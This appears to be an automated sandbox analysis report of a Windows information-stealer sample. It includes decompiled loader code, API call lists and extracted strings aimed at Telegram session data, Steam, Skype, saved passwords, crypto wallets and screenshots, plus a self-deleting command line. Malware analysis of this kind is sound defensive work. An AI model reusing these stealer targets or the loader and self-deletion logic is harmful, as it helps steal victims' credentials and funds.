                                                                      0x00419ae9
                                                                      0x00419af4
                                                                      0x00419afb
                                                                      0x00419b0c
                                                                      0x00419b1d
                                                                      0x00419b22
                                                                      0x00419b28
                                                                      0x00419b33
                                                                      0x00419b3a
                                                                      0x00419b4b
                                                                      0x00419b5c
                                                                      0x00419b61
                                                                      0x00419b67
                                                                      0x00419b75
                                                                      0x00419b7a
                                                                      0x00419b80
                                                                      0x00419b8b
                                                                      0x00419b9c
                                                                      0x00419ba1
                                                                      0x00419baf
                                                                      0x00419bb4
                                                                      0x00419bb9
                                                                      0x00419bc1
                                                                      0x00419bcb
                                                                      0x00419bce
                                                                      0x00419bd3
                                                                      0x00419bdb
                                                                      0x00419be0
                                                                      0x00419be6
                                                                      0x00419beb
                                                                      0x00419bf3
                                                                      0x00419bf8
                                                                      0x00419bfe
                                                                      0x00419c03
                                                                      0x00419c0b
                                                                      0x00419c10
                                                                      0x00419c16
                                                                      0x00419c1b
                                                                      0x00419c25
                                                                      0x00419c2a
                                                                      0x00419c2e
                                                                      0x00419c30
                                                                      0x00419c33
                                                                      0x00419c38
                                                                      0x00419c46
                                                                      0x00419c54
                                                                      0x00419c54
                                                                      0x00419c64
                                                                      0x00419c70
                                                                      0x00419c75
                                                                      0x00419c7a
                                                                      0x00419c83
                                                                      0x00419c8a
                                                                      0x00419c91
                                                                      0x00419c99
                                                                      0x00419c9e
                                                                      0x00419ca1
                                                                      0x00419db1
                                                                      0x00419db1
                                                                      0x00419dbc
                                                                      0x00419dcc
                                                                      0x00419dd1
                                                                      0x00419dec
                                                                      0x00419df4
                                                                      0x00419df9
                                                                      0x00419dff
                                                                      0x00419e03
                                                                      0x00419e16
                                                                      0x00419e1b
                                                                      0x00419e25
                                                                      0x00419e31
                                                                      0x00419e39
                                                                      0x00419e4a
                                                                      0x00419e5a
                                                                      0x00419e6b
                                                                      0x00419e7e
                                                                      0x00419e8f
                                                                      0x00419ea0
                                                                      0x00419ebb
                                                                      0x00419ecb
                                                                      0x00419ed9
                                                                      0x00419eea
                                                                      0x00419efb
                                                                      0x00419f0b
                                                                      0x00419f11
                                                                      0x00419f13
                                                                      0x00419f20
                                                                      0x00419f27
                                                                      0x00419f2b
                                                                      0x00419f2b
                                                                      0x00419e03
                                                                      0x00000000
                                                                      0x00419df9
                                                                      0x00419ddb
                                                                      0x00419de0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00419de2
                                                                      0x00000000
                                                                      0x00419ca7
                                                                      0x00419ca7
                                                                      0x00419cb2
                                                                      0x00419cc1
                                                                      0x00419cc4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00419cca
                                                                      0x00419ccb
                                                                      0x00419ccd
                                                                      0x00419ccd
                                                                      0x00419cdd
                                                                      0x00419ce2
                                                                      0x00419ce5
                                                                      0x00419cf3
                                                                      0x00419d00
                                                                      0x00419d03
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00419d13
                                                                      0x00419d18
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00419d1e
                                                                      0x00419d2c
                                                                      0x00419d31
                                                                      0x00419d3f
                                                                      0x00419d42
                                                                      0x00419d85
                                                                      0x00419d85
                                                                      0x00419d89
                                                                      0x00419d96
                                                                      0x00419da4
                                                                      0x00419da4
                                                                      0x00000000
                                                                      0x00419d89
                                                                      0x00419d44
                                                                      0x00419d45
                                                                      0x00419d4c
                                                                      0x00419d5b
                                                                      0x00419d66
                                                                      0x00419d75
                                                                      0x00419d7d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00419d7f
                                                                      0x00419d82
                                                                      0x00419d83
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00419d83
                                                                      0x00000000
                                                                      0x00419da9
                                                                      0x00419da9
                                                                      0x00419daa
                                                                      0x00419daa
                                                                      0x00419daa
                                                                      0x00000000
                                                                      0x00419ccd
                                                                      0x00419327
                                                                      0x00419327
                                                                      0x00419328
                                                                      0x0041932a
                                                                      0x00419338
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00419340
                                                                      0x004193bb
                                                                      0x004193bd
                                                                      0x004193bd
                                                                      0x004193c5
                                                                      0x004193c8
                                                                      0x004193cc
                                                                      0x004193d3
                                                                      0x004193d8
                                                                      0x004193dd
                                                                      0x004193e0
                                                                      0x004193e7
                                                                      0x004193e7
                                                                      0x004193e0
                                                                      0x004193f6
                                                                      0x004193fd
                                                                      0x004193fd
                                                                      0x0041940c
                                                                      0x0041941b
                                                                      0x00419420
                                                                      0x0041942a
                                                                      0x0041942a
                                                                      0x00419439
                                                                      0x00419440
                                                                      0x00419440
                                                                      0x0041944f
                                                                      0x00419451
                                                                      0x00419453
                                                                      0x00419455
                                                                      0x0041945d
                                                                      0x00419465
                                                                      0x00419468
                                                                      0x0041946d
                                                                      0x0041946f
                                                                      0x00419470
                                                                      0x00419475
                                                                      0x0041947d
                                                                      0x0041947d
                                                                      0x0041948c
                                                                      0x0041948e
                                                                      0x0041948e
                                                                      0x0041948c
                                                                      0x00419492
                                                                      0x00419498
                                                                      0x0041949b
                                                                      0x00419825
                                                                      0x0041982e
                                                                      0x00419830
                                                                      0x00419836
                                                                      0x00419839
                                                                      0x00419841
                                                                      0x00419846
                                                                      0x00419846
                                                                      0x00419851
                                                                      0x00419854
                                                                      0x0041985a
                                                                      0x00419868
                                                                      0x00419878
                                                                      0x0041987d
                                                                      0x004198f7
                                                                      0x004198fc
                                                                      0x0041987f
                                                                      0x0041987f
                                                                      0x00419893
                                                                      0x004198a9
                                                                      0x004198b2
                                                                      0x004198bf
                                                                      0x004198c4
                                                                      0x004198c7
                                                                      0x004198cc
                                                                      0x004198da
                                                                      0x004198e5
                                                                      0x004198ea
                                                                      0x004198ea
                                                                      0x0041987d
                                                                      0x004194a1
                                                                      0x004194af
                                                                      0x004194bd
                                                                      0x004194d0
                                                                      0x0041974e
                                                                      0x00419759
                                                                      0x00419766
                                                                      0x00419776
                                                                      0x0041978a
                                                                      0x00419796
                                                                      0x0041979b
                                                                      0x0041979b
                                                                      0x0041979e
                                                                      0x0041979f
                                                                      0x004197a1
                                                                      0x004197a9
                                                                      0x004197ac
                                                                      0x004197bc
                                                                      0x004197cd
                                                                      0x004197d8
                                                                      0x004197e5
                                                                      0x004197f0
                                                                      0x00419802
                                                                      0x00419813
                                                                      0x0041981e
                                                                      0x0041981f
                                                                      0x00419820
                                                                      0x00000000
                                                                      0x00419820
                                                                      0x004194da
                                                                      0x004194df
                                                                      0x004194e7
                                                                      0x004194f2
                                                                      0x004194f3
                                                                      0x004194f8
                                                                      0x00419503
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00419509
                                                                      0x00419734
                                                                      0x00419515
                                                                      0x00419524
                                                                      0x00419535
                                                                      0x00419540
                                                                      0x00419543
                                                                      0x00419548
                                                                      0x0041954a
                                                                      0x00419556
                                                                      0x0041955f
                                                                      0x0041956a
                                                                      0x0041956b
                                                                      0x00419570
                                                                      0x00419583
                                                                      0x00419594
                                                                      0x0041959f
                                                                      0x004195a9
                                                                      0x004195b4
                                                                      0x004195b5
                                                                      0x004195b6
                                                                      0x004195c4
                                                                      0x004195cc
                                                                      0x004195d4
                                                                      0x004195d7
                                                                      0x004195dc
                                                                      0x004195e7
                                                                      0x004195fc
                                                                      0x0041960e
                                                                      0x0041961e
                                                                      0x0041962c
                                                                      0x0041963a
                                                                      0x0041964b
                                                                      0x00419659
                                                                      0x0041966a
                                                                      0x00419675
                                                                      0x00419682
                                                                      0x00419692
                                                                      0x004196a6
                                                                      0x004196b2
                                                                      0x004196b7
                                                                      0x004196b7
                                                                      0x004196ba
                                                                      0x004196bb
                                                                      0x004196cb
                                                                      0x004196dc
                                                                      0x004196e7
                                                                      0x004196f4
                                                                      0x004196ff
                                                                      0x0041970e
                                                                      0x0041971f
                                                                      0x0041972a
                                                                      0x0041972b
                                                                      0x0041972c
                                                                      0x0041972c
                                                                      0x00419731
                                                                      0x00419731
                                                                      0x00419731
                                                                      0x00000000
                                                                      0x0041973d
                                                                      0x00419901
                                                                      0x00419901
                                                                      0x00419902
                                                                      0x00419902
                                                                      0x00419902
                                                                      0x00000000
                                                                      0x0041932a
                                                                      0x00419321

                                                                      APIs
                                                                      • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00419195
                                                                        • Part of subcall function 00408328: CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
                                                                        • Part of subcall function 00408328: CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
                                                                      • GetSystemMetrics.USER32 ref: 00419460
                                                                      • GetSystemMetrics.USER32 ref: 00419468
                                                                      • ExitProcess.KERNEL32(00000000), ref: 00419F2B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Create$DirectoryMetricsSystem$ExitMutexProcess
                                                                      • String ID: "countryCode":"$"query":"$%DSK_$%appdata%\Telegram Desktop\tdata\$%comspec%$/c %WINDIR%\system32\timeout.exe 3 & del "$0_@$<$</c>$</d>$</n>$<c>$<d>$<n>$Coins$D877F783D5*,map*$Files\$GET$PasswordsList.txt$Skype$Steam$System.txt$Telegram$exit$http://ip-api.com/json$image/jpeg$ip.txt$scr.jpg
                                                                      • API String ID: 447519224-805684967
                                                                      • Opcode ID: 1c7e7bd3b57c3ebf540cd3875733a8de147795d5b5e20487decf991366150f99
                                                                      • Instruction ID: 8e865d1d98f6c8efaf34d3e531d58462b667ba857a61b59ff422c1b99a10b1ba
                                                                      • Opcode Fuzzy Hash: 1c7e7bd3b57c3ebf540cd3875733a8de147795d5b5e20487decf991366150f99
                                                                      • Instruction Fuzzy Hash: 4F920E34A0011D9FDB11EB55C885BCDB7B9AF49308F5081BBE408B7292DB38AF958F59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040831C Relevance: 35.3, APIs: 17, Strings: 3, Instructions: 323libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 633 40831c-40832b 635 408330-408335 633->635 635->635 636 408337-4083fa call 403980 call 406c4c call 406258 * 2 call 403d2c call 403e1c call 4062d8 call 403bbc call 403d3c CreateDirectoryW call 4081a0 call 40813c call 403db8 call 4076b0 635->636 663 408444-40845a 636->663 664 4083fc-40843f call 403e1c call 4062d8 call 403bbc call 403d3c CreateDirectoryW call 4081a0 636->664 669 40845c-40847a call 4040b0 call 403d3c 663->669 670 40847e-4084ee call 403e1c call 403d3c * 2 SetCurrentDirectoryW call 40813c call 403db8 call 403d3c LoadLibraryExW 663->670 664->663 669->670 694 4084f4-4086c2 call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress 670->694 695 408737-408780 call 403508 call 403b98 call 403508 call 403b98 call 4034e4 670->695 694->695 759 4086c4-4086cb 694->759 759->695 760 4086cd-4086d4 759->760 760->695 761 4086d6-4086dd 760->761 761->695 762 4086df-4086e6 761->762 762->695 763 4086e8-4086ef 762->763 763->695 764 4086f1-4086f8 763->764 764->695 765 4086fa-408701 764->765 765->695 766 408703-40870a 765->766 766->695 767 40870c-408713 766->767 767->695 768 408715-40871c 767->768 768->695 769 40871e-408725 768->769 769->695 770 408727-40872e 769->770 770->695 771 408730 770->771 771->695
                                                                      C-Code - Quality: 74%
                                                                      			E0040831C(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				intOrPtr _v117;
				void* _t69;
				void* _t96;
				intOrPtr* _t97;
				intOrPtr* _t103;
				struct HINSTANCE__* _t117;
				intOrPtr* _t211;
				void* _t226;
				intOrPtr _t244;
				void* _t270;
				intOrPtr _t272;
				intOrPtr _t273;

				_t269 = __esi;
				 *__eax =  *__eax + __eax;
				_t69 = __eax +  *__eax;
				 *_t69 =  *_t69 + _t69;
				asm("das");
				 *_t69 =  *_t69 + _t69;
				_v117 = _v117 + __edx;
				_t272 = _t273;
				_t226 = 0xd;
				do {
					_push(0);
					_push(0);
					_t226 = _t226 - 1;
					_t277 = _t226;
				} while (_t226 != 0);
				_push(_t226);
				_push(__ebx);
				_push(__esi);
				_v8 = _t69;
				E00403980(_v8);
				_push(_t272);
				_push(0x408781);
				_push( *[fs:eax]);
				 *[fs:eax] = _t273;
				 *0x41b0d8 = 0;
				E00406C4C( &_v28, 0x41c7bc, __esi); // executed
				E00406258(_v28, 0x41c7bc,  &_v24, __esi, _t277);
				E00406258(_v24, 0x41c7bc,  &_v20, _t269, _t277);
				E00403D2C( &_v16, _v20);
				_push(L"%TEMP%\\");
				_push(_v16);
				_push(0x4087a8);
				E00403E1C();
				E004062D8(_v36,  &_v32, _t277);
				E00403BBC(0x41c7c0, _v32);
				CreateDirectoryW(E00403D3C( *0x41c7c0), 0); // executed
				E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t269, _t277); // executed
				E0040813C(9,  &_v44);
				E00403DB8( &_v40, _v44,  *0x41c7c0, _t277);
				_t96 = E004076B0(_v40, 0x41c7bc, _v44); // executed
				_t278 = _t96;
				if(_t96 == 0) {
					_push(L"%appdata%\\");
					_push(_v16);
					_push(0x4087a8);
					E00403E1C();
					E004062D8(_v52,  &_v48, _t278);
					E00403BBC(0x41c7c0, _v48);
					CreateDirectoryW(E00403D3C( *0x41c7c0), 0);
					E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t269, _t278);
				}
				_t97 =  *0x41b578; // 0x41c6b0
				_t270 =  *((intOrPtr*)( *_t97))(L"PATH", 0, 0);
				_t279 = _t270;
				if(_t270 > 0) {
					E004040B0( &_v12, _t270);
					_t211 =  *0x41b578; // 0x41c6b0
					 *((intOrPtr*)( *_t211))(L"PATH", E00403D3C(_v12), _t270);
				}
				E00403E1C();
				_t103 =  *0x41b614; // 0x41c6ac
				 *((intOrPtr*)( *_t103))(L"PATH", E00403D3C(_v12), _v12, E004087D8,  *0x41c7c0);
				SetCurrentDirectoryW(E00403D3C( *0x41c7c0)); // executed
				E0040813C(9,  &_v60);
				E00403DB8( &_v56, _v60,  *0x41c7c0, _t279);
				_t117 = LoadLibraryExW(E00403D3C(_v56), 0, 8); // executed
				 *0x41c7bc = _t117;
				if( *0x41c7bc != 0) {
					E00408120(0x84,  &_v64);
					 *0x41c784 = GetProcAddress( *0x41c7bc, E00403990(_v64));
					E00408120(0x85,  &_v68);
					 *0x41c788 = GetProcAddress( *0x41c7bc, E00403990(_v68));
					E00408120(0x86,  &_v72);
					 *0x41c78c = GetProcAddress( *0x41c7bc, E00403990(_v72));
					E00408120(0x87,  &_v76);
					 *0x41c790 = GetProcAddress( *0x41c7bc, E00403990(_v76));
					E00408120(0x88,  &_v80);
					 *0x41c794 = GetProcAddress( *0x41c7bc, E00403990(_v80));
					E00408120(0x89,  &_v84);
					 *0x41c798 = GetProcAddress( *0x41c7bc, E00403990(_v84));
					E00408120(0x8a,  &_v88);
					 *0x41c79c = GetProcAddress( *0x41c7bc, E00403990(_v88));
					E00408120(0x12,  &_v92);
					 *0x41c7a0 = GetProcAddress( *0x41c7bc, E00403990(_v92));
					E00408120(0x13,  &_v96);
					 *0x41c7a4 = GetProcAddress( *0x41c7bc, E00403990(_v96));
					E00408120(0x14,  &_v100);
					 *0x41c7a8 = GetProcAddress( *0x41c7bc, E00403990(_v100));
					E00408120(0x15,  &_v104);
					 *0x41c7ac = GetProcAddress( *0x41c7bc, E00403990(_v104));
					E00408120(0x16,  &_v108);
					 *0x41c7b0 = GetProcAddress( *0x41c7bc, E00403990(_v108));
					E00408120(0x17,  &_v112);
					 *0x41c7b4 = GetProcAddress( *0x41c7bc, E00403990(_v112));
					if( *0x41c784 != 0 &&  *0x41c788 != 0 &&  *0x41c78c != 0 &&  *0x41c790 != 0 &&  *0x41c794 != 0 &&  *0x41c798 != 0 &&  *0x41c79c != 0 &&  *0x41c7a0 != 0 &&  *0x41c7a4 != 0 &&  *0x41c7a8 != 0 &&  *0x41c7ac != 0 &&  *0x41c7b0 != 0 &&  *0x41c7b4 != 0) {
						 *0x41b0d8 = 1;
					}
				}
				_pop(_t244);
				 *[fs:eax] = _t244;
				_push(E00408788);
				E00403508( &_v112, 0xd);
				E00403B98( &_v60, 8);
				E00403508( &_v28, 3);
				E00403B98( &_v16, 2);
				return E004034E4( &_v8);
			}










































                                                                      0x0040831c
                                                                      0x0040831e
                                                                      0x00408320
                                                                      0x00408322
                                                                      0x00408324
                                                                      0x00408325
                                                                      0x00408327
                                                                      0x00408329
                                                                      0x0040832b
                                                                      0x00408330
                                                                      0x00408330
                                                                      0x00408332
                                                                      0x00408334
                                                                      0x00408334
                                                                      0x00408334
                                                                      0x00408337
                                                                      0x00408338
                                                                      0x00408339
                                                                      0x0040833b
                                                                      0x00408341
                                                                      0x00408352
                                                                      0x00408353
                                                                      0x00408358
                                                                      0x0040835b
                                                                      0x0040835e
                                                                      0x00408368
                                                                      0x00408373
                                                                      0x0040837e
                                                                      0x00408389
                                                                      0x0040838e
                                                                      0x00408393
                                                                      0x00408396
                                                                      0x004083a3
                                                                      0x004083ae
                                                                      0x004083b8
                                                                      0x004083c7
                                                                      0x004083d1
                                                                      0x004083de
                                                                      0x004083eb
                                                                      0x004083f3
                                                                      0x004083f8
                                                                      0x004083fa
                                                                      0x004083fc
                                                                      0x00408401
                                                                      0x00408404
                                                                      0x00408411
                                                                      0x0040841c
                                                                      0x00408426
                                                                      0x00408435
                                                                      0x0040843f
                                                                      0x0040843f
                                                                      0x0040844d
                                                                      0x00408456
                                                                      0x00408458
                                                                      0x0040845a
                                                                      0x00408461
                                                                      0x00408475
                                                                      0x0040847c
                                                                      0x0040847c
                                                                      0x00408490
                                                                      0x004084a3
                                                                      0x004084aa
                                                                      0x004084bb
                                                                      0x004084c9
                                                                      0x004084d6
                                                                      0x004084e4
                                                                      0x004084e9
                                                                      0x004084ee
                                                                      0x004084fc
                                                                      0x00408512
                                                                      0x0040851f
                                                                      0x00408535
                                                                      0x00408542
                                                                      0x00408558
                                                                      0x00408565
                                                                      0x0040857b
                                                                      0x00408588
                                                                      0x0040859e
                                                                      0x004085ab
                                                                      0x004085c1
                                                                      0x004085ce
                                                                      0x004085e4
                                                                      0x004085f1
                                                                      0x00408607
                                                                      0x00408614
                                                                      0x0040862a
                                                                      0x00408637
                                                                      0x0040864d
                                                                      0x0040865a
                                                                      0x00408670
                                                                      0x0040867d
                                                                      0x00408693
                                                                      0x004086a0
                                                                      0x004086b6
                                                                      0x004086c2
                                                                      0x00408730
                                                                      0x00408730
                                                                      0x004086c2
                                                                      0x00408739
                                                                      0x0040873c
                                                                      0x0040873f
                                                                      0x0040874c
                                                                      0x00408759
                                                                      0x00408766
                                                                      0x00408773
                                                                      0x00408780

                                                                      APIs
                                                                      • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
                                                                      • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
                                                                      • SetCurrentDirectoryW.KERNEL32(00000000,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084BB
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressProc$Directory$Create$CurrentLibraryLoad
                                                                      • String ID: %TEMP%\$%appdata%\$PATH
                                                                      • API String ID: 1998666822-1089150275
                                                                      • Opcode ID: a3a7f0e04276fa5588cadaa871e822f5307a06622094e1642ca5e6744384a9c2
                                                                      • Instruction ID: 107c2c44d9e3562d342af0426f92bc8293728700e54ee15747b3200e896e575f
                                                                      • Opcode Fuzzy Hash: a3a7f0e04276fa5588cadaa871e822f5307a06622094e1642ca5e6744384a9c2
                                                                      • Instruction Fuzzy Hash: 08C12A709002059BDB01EBA9DD86BCE77B8EF49308F20457BB454BB2D6CB78AD05CB59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00408324 Relevance: 35.3, APIs: 17, Strings: 3, Instructions: 319libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 772 408324-40832b 773 408330-408335 772->773 773->773 774 408337-4083fa call 403980 call 406c4c call 406258 * 2 call 403d2c call 403e1c call 4062d8 call 403bbc call 403d3c CreateDirectoryW call 4081a0 call 40813c call 403db8 call 4076b0 773->774 801 408444-40845a 774->801 802 4083fc-40843f call 403e1c call 4062d8 call 403bbc call 403d3c CreateDirectoryW call 4081a0 774->802 807 40845c-40847a call 4040b0 call 403d3c 801->807 808 40847e-4084ee call 403e1c call 403d3c * 2 SetCurrentDirectoryW call 40813c call 403db8 call 403d3c LoadLibraryExW 801->808 802->801 807->808 832 4084f4-4086c2 call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress 808->832 833 408737-408780 call 403508 call 403b98 call 403508 call 403b98 call 4034e4 808->833 832->833 897 4086c4-4086cb 832->897 897->833 898 4086cd-4086d4 897->898 898->833 899 4086d6-4086dd 898->899 899->833 900 4086df-4086e6 899->900 900->833 901 4086e8-4086ef 900->901 901->833 902 4086f1-4086f8 901->902 902->833 903 4086fa-408701 902->903 903->833 904 408703-40870a 903->904 904->833 905 40870c-408713 904->905 905->833 906 408715-40871c 905->906 906->833 907 40871e-408725 906->907 907->833 908 408727-40872e 907->908 908->833 909 408730 908->909 909->833
                                                                      C-Code - Quality: 73%
                                                                      			E00408324(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				intOrPtr _v117;
				void* _t95;
				intOrPtr* _t96;
				intOrPtr* _t102;
				struct HINSTANCE__* _t116;
				intOrPtr* _t210;
				void* _t225;
				intOrPtr _t243;
				void* _t269;
				intOrPtr _t271;
				intOrPtr _t272;

				_t268 = __esi;
				asm("das");
				 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
				_v117 = _v117 + __edx;
				_t271 = _t272;
				_t225 = 0xd;
				do {
					_push(0);
					_push(0);
					_t225 = _t225 - 1;
					_t274 = _t225;
				} while (_t225 != 0);
				_push(_t225);
				_push(__ebx);
				_push(__esi);
				_v8 = __eax;
				E00403980(_v8);
				_push(_t271);
				_push(0x408781);
				_push( *[fs:eax]);
				 *[fs:eax] = _t272;
				 *0x41b0d8 = 0;
				E00406C4C( &_v28, 0x41c7bc, __esi); // executed
				E00406258(_v28, 0x41c7bc,  &_v24, __esi, _t274);
				E00406258(_v24, 0x41c7bc,  &_v20, _t268, _t274);
				E00403D2C( &_v16, _v20);
				_push(L"%TEMP%\\");
				_push(_v16);
				_push(0x4087a8);
				E00403E1C();
				E004062D8(_v36,  &_v32, _t274);
				E00403BBC(0x41c7c0, _v32);
				CreateDirectoryW(E00403D3C( *0x41c7c0), 0); // executed
				E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t268, _t274); // executed
				E0040813C(9,  &_v44);
				E00403DB8( &_v40, _v44,  *0x41c7c0, _t274);
				_t95 = E004076B0(_v40, 0x41c7bc, _v44); // executed
				_t275 = _t95;
				if(_t95 == 0) {
					_push(L"%appdata%\\");
					_push(_v16);
					_push(0x4087a8);
					E00403E1C();
					E004062D8(_v52,  &_v48, _t275);
					E00403BBC(0x41c7c0, _v48);
					CreateDirectoryW(E00403D3C( *0x41c7c0), 0);
					E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t268, _t275);
				}
				_t96 =  *0x41b578; // 0x41c6b0
				_t269 =  *((intOrPtr*)( *_t96))(L"PATH", 0, 0);
				_t276 = _t269;
				if(_t269 > 0) {
					E004040B0( &_v12, _t269);
					_t210 =  *0x41b578; // 0x41c6b0
					 *((intOrPtr*)( *_t210))(L"PATH", E00403D3C(_v12), _t269);
				}
				E00403E1C();
				_t102 =  *0x41b614; // 0x41c6ac
				 *((intOrPtr*)( *_t102))(L"PATH", E00403D3C(_v12), _v12, E004087D8,  *0x41c7c0);
				SetCurrentDirectoryW(E00403D3C( *0x41c7c0)); // executed
				E0040813C(9,  &_v60);
				E00403DB8( &_v56, _v60,  *0x41c7c0, _t276);
				_t116 = LoadLibraryExW(E00403D3C(_v56), 0, 8); // executed
				 *0x41c7bc = _t116;
				if( *0x41c7bc != 0) {
					E00408120(0x84,  &_v64);
					 *0x41c784 = GetProcAddress( *0x41c7bc, E00403990(_v64));
					E00408120(0x85,  &_v68);
					 *0x41c788 = GetProcAddress( *0x41c7bc, E00403990(_v68));
					E00408120(0x86,  &_v72);
					 *0x41c78c = GetProcAddress( *0x41c7bc, E00403990(_v72));
					E00408120(0x87,  &_v76);
					 *0x41c790 = GetProcAddress( *0x41c7bc, E00403990(_v76));
					E00408120(0x88,  &_v80);
					 *0x41c794 = GetProcAddress( *0x41c7bc, E00403990(_v80));
					E00408120(0x89,  &_v84);
					 *0x41c798 = GetProcAddress( *0x41c7bc, E00403990(_v84));
					E00408120(0x8a,  &_v88);
					 *0x41c79c = GetProcAddress( *0x41c7bc, E00403990(_v88));
					E00408120(0x12,  &_v92);
					 *0x41c7a0 = GetProcAddress( *0x41c7bc, E00403990(_v92));
					E00408120(0x13,  &_v96);
					 *0x41c7a4 = GetProcAddress( *0x41c7bc, E00403990(_v96));
					E00408120(0x14,  &_v100);
					 *0x41c7a8 = GetProcAddress( *0x41c7bc, E00403990(_v100));
					E00408120(0x15,  &_v104);
					 *0x41c7ac = GetProcAddress( *0x41c7bc, E00403990(_v104));
					E00408120(0x16,  &_v108);
					 *0x41c7b0 = GetProcAddress( *0x41c7bc, E00403990(_v108));
					E00408120(0x17,  &_v112);
					 *0x41c7b4 = GetProcAddress( *0x41c7bc, E00403990(_v112));
					if( *0x41c784 != 0 &&  *0x41c788 != 0 &&  *0x41c78c != 0 &&  *0x41c790 != 0 &&  *0x41c794 != 0 &&  *0x41c798 != 0 &&  *0x41c79c != 0 &&  *0x41c7a0 != 0 &&  *0x41c7a4 != 0 &&  *0x41c7a8 != 0 &&  *0x41c7ac != 0 &&  *0x41c7b0 != 0 &&  *0x41c7b4 != 0) {
						 *0x41b0d8 = 1;
					}
				}
				_pop(_t243);
				 *[fs:eax] = _t243;
				_push(E00408788);
